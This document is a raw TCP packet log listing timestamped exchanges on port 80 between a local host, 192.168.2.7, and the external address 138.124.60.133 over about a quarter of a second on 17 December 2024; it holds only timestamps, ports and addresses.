Dec 17, 2024 08:21:46.868828058 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.868861914 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.868925095 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.869911909 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.869970083 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.870048046 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.870115995 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.871094942 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.871162891 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.871330976 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.871387005 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.872420073 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.872457027 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.872476101 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.872512102 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.873759031 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.873811007 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.873826027 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.873867035 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.874639988 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.874705076 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.874733925 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.874793053 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.875818014 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.875881910 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.875952959 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.876004934 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.877024889 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.877085924 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.877088070 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.877136946 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.878151894 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.878216982 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.878263950 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.878319979 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.879354000 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.879429102 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.879488945 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.879544020 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.880564928 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.880620956 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.880626917 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.880676031 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.881681919 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.881746054 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.881827116 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.881896019 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.882864952 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.882929087 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.882977009 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.883033037 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.884041071 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.884097099 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.884165049 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.884222031 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.885277987 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.885338068 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.885436058 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.885505915 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.886442900 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.886534929 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.886578083 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.886578083 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.887547016 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.887600899 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.887640953 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.887706041 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.888780117 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.888843060 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.888911009 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.888962984 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.889939070 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.890002012 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.890054941 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.890104055 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.891067982 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.891119957 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.891191006 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.891243935 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.892273903 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.892332077 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.892404079 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.892461061 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.893445015 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.893508911 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.893558025 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.893610001 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.894630909 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.894684076 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.894747972 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.894802094 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.895863056 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.895915985 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.895946026 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.895997047 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.897011995 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.897069931 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.897108078 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.897157907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.898148060 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.898202896 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.898257017 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.898308039 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.899300098 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.899350882 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.899432898 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.899485111 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.900521994 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.900576115 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.900583029 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.900634050 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.901689053 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.901761055 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.901768923 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.901829958 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.902838945 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.902889967 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.902930975 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.902981043 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.904002905 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.904052973 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.904145956 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.904195070 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.905203104 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.905260086 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.905313969 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.905364990 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.906405926 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.906460047 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.906512976 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.906558990 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.907546043 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.907608032 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.907660007 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.907710075 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.908761024 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.908813000 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.908817053 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.908901930 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.909908056 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.909960985 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.910022020 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.910073996 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.911077023 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.911137104 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.911185980 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.911240101 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.912389994 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.912441015 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.912451029 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.912501097 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.913451910 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.913500071 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.913542986 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.913594007 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.914622068 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.914679050 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.914694071 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.914748907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.961553097 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.961656094 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.961694956 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.961760998 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.962152958 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.962210894 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.962306976 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.962362051 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.963363886 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.963423014 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.963424921 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.963475943 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:46.964689970 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:46.964765072 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.049500942 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.049580097 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.049607992 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.049678087 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.049907923 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.049947977 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.049961090 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.049998045 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.050815105 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.050869942 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.050930977 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.050991058 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.051811934 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.051871061 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.051917076 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.051973104 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.052845955 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.052906036 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.052973032 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.053035021 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.053771019 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.053828955 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.053905010 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.053960085 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.054742098 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.054795027 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.054871082 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.054924965 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.055748940 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.055802107 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.055809975 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.055864096 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.056747913 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.056786060 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.056798935 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.056839943 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.058007002 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.058067083 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.058111906 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.058166027 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.058878899 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.058940887 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.059016943 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.059070110 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.059843063 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.059904099 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.059994936 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.060054064 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.060755968 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.060808897 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.060883999 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.060945034 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.061686993 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.061764002 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.061794996 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.061852932 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.062655926 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.062714100 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.062830925 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.062887907 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.063652992 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.063720942 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.063769102 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.063827991 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.064639091 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.064691067 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.064703941 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.064753056 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.065586090 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.065645933 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.065743923 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.065798044 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.066572905 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.066632032 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.066685915 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.066744089 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.067575932 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.067631960 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.067723989 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.067779064 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.068633080 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.068691969 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.068708897 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.068764925 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.069536924 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.069595098 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.069662094 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.069717884 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.070513964 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.070573092 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.070662022 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.070713043 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.071516991 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.071573019 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.071744919 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.071799994 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.072523117 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.072587967 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.072664022 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.072720051 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.073533058 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.073599100 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.073674917 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.073729038 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.074502945 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.074570894 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.074624062 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.074683905 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.075475931 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.075535059 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.075597048 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.075654984 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.076451063 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.076524019 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.076626062 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.076682091 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.077414989 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.077486038 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.077553034 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.077610016 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.078552008 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.078608990 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.078619957 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.078670025 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.079471111 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.079540968 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.079596996 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.079655886 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.080377102 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.080435991 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.080471039 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.080521107 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.081417084 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.081478119 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.081518888 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.081578016 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.082349062 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.082405090 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.082465887 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.082520008 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.083369970 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.083425999 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.083429098 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.083481073 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.084322929 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.084381104 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.084453106 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.084507942 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.085319996 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.085387945 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.085453033 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.085511923 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.086306095 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.086365938 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.086461067 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.086518049 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.087297916 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.087352037 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.087455034 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.087512970 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.088251114 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.088310957 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.088439941 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.088498116 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.089282036 CET	80	49762	138.124.60.133	192.168.2.7
Dec 17, 2024 08:21:47.089343071 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:21:47.089376926 CET	80	49762	138.124.60.133	192.168.2.7
